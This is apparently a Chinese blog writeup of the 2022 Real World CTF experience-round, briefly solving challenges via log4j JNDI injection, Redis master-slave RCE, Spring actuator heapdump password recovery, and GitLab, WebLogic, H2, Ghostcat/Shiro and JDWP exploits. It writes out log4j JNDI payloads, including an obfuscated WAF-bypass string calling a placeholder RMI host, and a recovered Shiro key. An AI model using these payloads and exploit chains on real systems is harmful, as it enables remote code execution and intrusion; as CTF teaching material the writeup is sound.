2022 Real World CTF体验赛Writeup

还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。

在这里插入图片描述

log4flag

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp}
在这里插入图片描述
存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}
直接搭建jndi服务,尝试反弹shell
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
flag:rwctf{d4b4b837f95542aa93b43ee280b230d8}

Be-a-Database-Hacker

在这里插入图片描述
根据提示,6379反弹,很明显的redis。
获取题目地址后
测试是否存在未授权访问
在这里插入图片描述
很明显存在未授权访问,而且redis版本<5.0.5,这里可以使用redis主从复制进行RCE。
在这里插入图片描述
在这里插入图片描述
flag:rwctf{c4374dba71fbf50144f7a1a04b7f5837}

the Secrets of Memory

在这里插入图片描述
在这里插入图片描述
tips很明显了,Spring Boot ActuatorRCE
在这里插入图片描述
访问/actuator/env的时候,actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 ****** 号替换,以达到脱敏的效果。
而这里提示,flag就是password,而这里的password,已经脱敏。在这里插入图片描述
在目标既不出网,/jolokia 接口又没有合适的 MBean 或者不支持 POST 请求的情况下,很多获取被星号脱敏的密码的明文的方法就失效了。
这时候就可以利用 Eclipse Memory Analyzer 来分析 /heapdump/actuator/heapdump 接口下载的 jvm heap 信息,查找密码明文。
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
在这里插入图片描述
flag:rwctf{d597d5defdd22829d8587efb9f9d0954}

baby flaglab

在这里插入图片描述
在这里插入图片描述
考点是Gitlab的一个CVE:CVE-2021-22205,直接echo 写 反弹shell 到 tmp目录 然后赋予执行权限 然后执行就可以。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:rwctf{4edb62cb7b37d647e13bfed4f8d4b860}

Ghost shiro

在这里插入图片描述
这个环境现在一直起不来,很迷。
讲下解题思路吧,shiro,但不是默认key
首先通过tomcat Ghostcat(CVE-2020-1938)漏洞读取shiro.ini配置文件,得到key:ODN6dDZxNzh5ejB6YTRseg==
接着直接打shiro550漏洞即可。

Flag Console

在这里插入图片描述
在这里插入图片描述
一个weblogic的CVE-2020-14882,不多说
在这里插入图片描述
在这里插入图片描述
flag:rwctf{a4c0185ddf2a4e679bd6f1df137c12ba}

Be-a-Database-Hacker 2

在这里插入图片描述
在这里插入图片描述
H2数据库,搜索一下存在哪些洞
在这里插入图片描述
CVE-2021-42392直接打
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:rwctf{6288999b40cda6a393f247ef82e137e2}

Java Remote Debugger

在这里插入图片描述
java debug调试,下载附件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
附件是一些java程序测试代码。
JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。如果这个时候就必须开启远程调试功能了,此时就有可能被攻击者利用 RCE。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:rwctf{2c0e7100bcb45cc825ca97eccb86e568}

2022年工控CTF是一场以工业控制系统为主题的网络安全。随着工业互联网的普及和工控系统的数字化转型,工控CTF成为了信息安全领域的重要事之一。 在2022年工控CTF中,参团队将面临一系列与工控系统相关的攻防挑战。这些挑战可以涉及到工控设备的漏洞利用、网络通信的拦截与解密、工控协议的逆向工程等多个方面。参团队需要通过团队合作和技术创新来解决这些挑战,保护工控系统的安全。 比期间,参团队将利用自身的技术实力和经验来攻击对手的工控系统,并尽量保护自己的系统免受攻击。团队成员需要通过分析工控设备的漏洞、拦截网络通信和复现攻击场景等手段,来获取对手的密码或控制权限,并将此作为攻击对手的关键。 这次工控CTF不仅是对技术实力的考验,也是对团队协作能力的挑战。参团队需要有效地分工合作,每个成员发挥擅长的技能,进行攻防策略的制定和执行。只有团队成员之间的密切配合和高效沟通,才能在限时的比中取得优异的成绩。 通过参与2022年工控CTF,参团队将能够提升自身的技术水平和安全意识,了解工控系统的安全挑战,并积累宝贵的实战经验。此外,比还将为工控安全领域的研究和发展带来新的思路和解决方案。总之,2022年工控CTF将是一场精彩纷呈的网络安全盛宴,为参者带来无尽的挑战和收获。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值